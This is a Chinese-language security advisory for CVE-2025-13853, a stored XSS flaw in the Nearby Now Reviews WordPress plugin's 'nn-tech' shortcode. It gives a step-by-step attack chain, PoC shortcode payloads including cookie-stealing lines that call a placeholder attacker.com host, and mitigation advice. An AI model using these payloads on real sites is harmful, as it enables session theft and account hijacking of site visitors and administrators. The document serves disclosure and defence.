CVE-2025-13853 WordPress Nearby Now Reviews插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-13853

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Nearby Now Reviews WordPress插件

漏洞概述

CVE-2025-13853是WordPress平台下Nearby Now Reviews插件的一个高危安全漏洞。该插件用于在WordPress网站上展示本地商家评论和评分功能。漏洞根源在于插件对用户输入的'data_tech'参数处理不当，未能进行充分的输入清理和输出转义。攻击者可利用WordPress的短代码功能，通过'nn-tech'短代码注入恶意JavaScript脚本。由于该漏洞属于存储型XSS，恶意代码会被永久保存在服务器数据库中，所有访问包含该短代码页面的用户都会自动执行攻击者植入的脚本。攻击门槛较低，具有Contributor级别权限的认证用户即可实施攻击，无需管理员权限或用户交互。该漏洞影响插件5.2及以下所有版本，CVSS评分6.4（中危），主要影响网站的机密性和完整性。攻击成功后可窃取用户会话Cookie、劫持用户账户、进行钓鱼攻击或传播恶意软件，对网站访问者和管理员均构成严重威胁。

技术细节

该漏洞是一个典型的存储型跨站脚本（Stored XSS）漏洞，存在于Nearby Now Reviews插件的nn-reviews.php文件第160行附近。漏洞产生的根本原因是插件在处理'nn-tech'短代码的'data_tech'参数时，直接将用户可控的输入插入到HTML输出中，未进行适当的输入验证和输出编码。WordPress的短代码机制允许注册自定义短代码，nn-tech短代码用于显示技术相关信息。当管理员或作者在页面中插入类似[nn-tech data_tech='用户输入']的短代码时，插件会直接将data_tech参数值渲染到页面HTML中。攻击者只需构造包含恶意JavaScript的Payload，如data_tech='"><script>alert(document.cookie)</script>'，即可将恶意代码存储到数据库。由于输出时未进行HTML实体转义，浏览器会将其作为有效脚本执行。存储型XSS的危险性在于：恶意代码随页面永久存储，攻击范围覆盖所有访问该页面的用户，且无需受害者点击任何链接。攻击者可结合会话劫持进一步提升权限，或利用管理员访问后台时获取更高权限。

攻击链分析

STEP 1

信息收集

攻击者首先确认目标网站使用WordPress CMS，并安装有Nearby Now Reviews插件（版本<=5.2）。可通过网站指纹识别或查看页面源码确认插件存在。

STEP 2

账户获取

攻击者需要获取WordPress账户权限。最低需要Contributor级别账户，可通过默认注册功能、弱口令爆破或社工手段获取。Contributor角色默认有创建和编辑文章的权限。

STEP 3

Payload构造

攻击者构造恶意XSS Payload，利用nn-tech短代码的data_tech参数。常见Payload格式：'><script>alert(document.domain)</script>，或更复杂的窃取Cookie脚本。

STEP 4

注入恶意代码

在WordPress编辑器中插入包含恶意短代码的文章或页面。短代码格式如：[nn-tech data_tech='恶意代码']，然后发布或更新文章。

STEP 5

代码持久化

恶意代码随文章内容存储到WordPress数据库中。由于是存储型XSS，代码会永久存在于页面中，除非文章被删除或漏洞被修复。

STEP 6

触发执行

当其他用户（包括管理员）访问包含恶意代码的页面时，浏览器会解析HTML并将恶意JavaScript作为页面的一部分执行，无需受害者点击任何内容。

STEP 7

攻击效果

JavaScript执行后可窃取用户会话Cookie、劫持账户、修改页面内容、传播恶意软件或进行进一步的社会工程攻击。管理员访问时可能直接获取后台管理权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- WordPress Stored XSS PoC for CVE-2025-13853 -->
<!-- Affected: Nearby Now Reviews Plugin <= 5.2 -->
<!-- Attack Vector: nn-tech shortcode data_tech parameter -->

<!-- Method 1: Basic XSS Payload -->
[nn-tech data_tech='"><script>alert("XSS")</script>']

<!-- Method 2: Cookie Stealing Payload -->
[nn-tech data_tech='"><img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">']

<!-- Method 3: Session Hijacking Payload -->
[nn-tech data_tech='"><script>document.location='https://attacker.com/hijack.php?cookie='+document.cookie</script>']

<!-- Method 4: Defacement Payload -->
[nn-tech data_tech='"><script>document.body.innerHTML='<h1>Hacked</h1>'</script>']

<!-- HTML Context (how it appears in source) -->
<!-- <div class="nn-tech">"><script>alert("XSS")</script></div> -->

<!-- Exploitation Steps: -->
<!-- 1. Login as Contributor or higher role -->
<!-- 2. Create/Edit a post or page -->
<!-- 3. Insert the malicious shortcode -->
<!-- 4. Publish the post -->
<!-- 5. Any user visiting the page will execute the JavaScript -->

影响范围

Nearby Now Reviews WordPress插件 <= 5.2

防御指南

临时缓解措施

在官方安全补丁发布之前，可采取以下临时缓解措施：1) 使用WordPress安全插件禁用或过滤未授权的短代码执行；2) 通过.htaccess或Nginx配置添加针对XSS特征的过滤规则；3) 临时禁用nn-tech短代码功能，修改主题functions.php添加remove_shortcode('nn-tech')；4) 加强用户注册审核，禁用公开注册功能；5) 对所有现有文章进行安全扫描，查找并清除已注入的恶意短代码；6) 限制低权限用户发布文章的审核流程，所有内容需管理员审核后方可发布；7) 实施严格的Content Security Policy，阻止内联脚本执行；8) 监控网站日志，关注异常的短代码使用和可疑的JavaScript执行请求。